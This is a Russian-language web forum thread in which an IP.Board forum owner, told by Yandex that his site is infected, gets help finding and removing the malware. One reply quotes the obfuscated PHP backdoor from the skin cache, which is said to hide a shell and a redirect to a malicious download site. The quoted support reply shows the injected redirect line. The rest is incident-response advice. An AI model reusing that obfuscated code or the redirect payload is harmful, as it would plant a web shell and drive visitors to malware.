Karagor Posted February 1, 2015 Share Posted February 1, 2015 Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом. Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"А именно: Поведенческий анализ Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей. Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно. Написал вопрос в саппорт, ответ был следующим: На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое: document.location='http://filestore321.com/download.php?id=6de46215' Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.В общем я в тупике и не понимаю в какую сторону мне рыть. Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел. Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь. Link to comment Share on other sites More sharing options...
siv1987 Posted February 1, 2015 Share Posted February 1, 2015 В последнее время часто наблюдаю взломы подобного типа. Прямо на днях пришлось лечить один форум, а некоторые форумы тех поддержки так и сидят в серпе с этой заразой (привет товарищам с сайт нарушает авторские права). Есть предположение что связано это с последней найденной уязвимостью (sql-injection). Предположение основано на том, что там стояла версия 3.4.5 потом делалось обновление на 3.4.7 со всеми патчами безопасности, после чего обнаружился вирус. Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид: $pk='MD5 HASH'; $rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.'; $pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx'; $pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK['; $f='%t%'.substr($rsa,566,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); Сигнатура обфусцированного кода может отличатся в разных случаях. Закадирован в нем шелл и редирект на filestore321.com/download.php?id={$m}.Деятельность вируса палится по наличию куке lang_id eng после ридеректа на вредоносный сайт - заплатка для предотвращения повторного редиректа.Проверить на взлом этим вирусом можно перейдя на форум из поисковых систем. Также можно проверить по адресу forum.ru/index.php?ipbv=hash&g=js, если откроется пустая страница значит форум заражен (при первом заходе на форум нужно два раза запросить этот адрес). Основная суть лечения заключается в:Проверка шаблона Глобальные -> includeJS в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша. Обновления форума до актуальной версии или обязательная установка всех патчей безопасности после выхода вашей версииСмена паролей для:- всех (!) пользователей имеющих доступ в АЦ- базе данных- фтпДобавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума). Проверка, как правило, длится несколько дней. Но это не дает гарантий что злоумышленик не оставил шеллы где-то еще в других файлах. Для полного лечения нужно просканировать весь форум специальным сканером шеллов, либо искать вручную вредоносные сигнатуры и функции которые чаще всего используются для составления закладок - eval, assert, base64_decode, preg_replace, etc и анализировать их на предмет вредоносности. Популярным для этих целей является скрипт ai-bolit - www.revisium.com/ai/. Хотя работает он жутко медленно и сканрует все подряд, ранние его версии мне больше нравились. 9 Link to comment Share on other sites More sharing options...
Атаман Posted February 2, 2015 Share Posted February 2, 2015 Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт. 2 Link to comment Share on other sites More sharing options...
Karagor Posted February 2, 2015 Author Share Posted February 2, 2015 Ох, спасибо.Видимо предстоит нешуточный геморрой ((( Буду пробовать. Link to comment Share on other sites More sharing options...
Karagor Posted February 2, 2015 Author Share Posted February 2, 2015 Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый? Link to comment Share on other sites More sharing options...
newbie Posted February 2, 2015 Share Posted February 2, 2015 Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__88545Ниже еще найдете ссылку на последний патч 1 Link to comment Share on other sites More sharing options...
Атаман Posted February 2, 2015 Share Posted February 2, 2015 http://forums.ibresource.ru/topic/65897-ipboard-33x-34x-security-update/ Link to comment Share on other sites More sharing options...
Атаман Posted February 2, 2015 Share Posted February 2, 2015 Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт. И все зараженные страницы видно в веб мастере. Link to comment Share on other sites More sharing options...
siv1987 Posted February 2, 2015 Share Posted February 2, 2015 А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тдУ яндекса конечно бывают глюки, особенно на всякие скрипты контекстной рекламы (учитывая последний фейл google adwords'а откуда долгое время лился трафик на вирусные сайта) и картинок с зараженных сайтов, но в свете последней волны взломов я бы всетаки тщательно проверил форум на взлом. 1 Link to comment Share on other sites More sharing options...
Karagor Posted February 2, 2015 Author Share Posted February 2, 2015 Отчитываюсь: 1. Патч поставил2. Обновил кеш стилей3. Поменял все пароли На данный момент по запросу sport-horse.pro/index.php?ipbv=hash&g=js вместо пустой страницы выдается страница сайта.Послал в яндекс запрос на перепроверку сайта. Жду ) Link to comment Share on other sites More sharing options...
Karagor Posted February 2, 2015 Author Share Posted February 2, 2015 Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.Почитал у них на сайте ФАК, пошел запускать через SSH Запустил, ждем-с 55к файлов... Link to comment Share on other sites More sharing options...
siv1987 Posted February 2, 2015 Share Posted February 2, 2015 По поводу патчей. Желательно ставить не один конкретный, а все имеющиеся. В каждом из них закрыта какая-то уязвимость, какие-то более критические, какие-то нет. А лучше всего обновится до последней версии. Была бы английская версия, можно было скачать пропатченный дистрибутив из клиентцентра. Link to comment Share on other sites More sharing options...
siv1987 Posted February 2, 2015 Share Posted February 2, 2015 Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.Из браузера даже не стоит пытаться. Только из ssh. Скрипт нужно сконфигурировать чтобы сканировал только php файлы. Link to comment Share on other sites More sharing options...
Karagor Posted February 2, 2015 Author Share Posted February 2, 2015 На данный момент кончилась лицензия, а по новому курсу платить за продление пока не решаюсь. А патчи не накопительные разве? Но я вообще-то ставил все, кроме последнего. Link to comment Share on other sites More sharing options...
siv1987 Posted February 2, 2015 Share Posted February 2, 2015 А патчи не накопительные разве?Накопительные - это версии. А патчи устраняют найденную в определенный момент времени конкретную проблему. Link to comment Share on other sites More sharing options...
Recommended Posts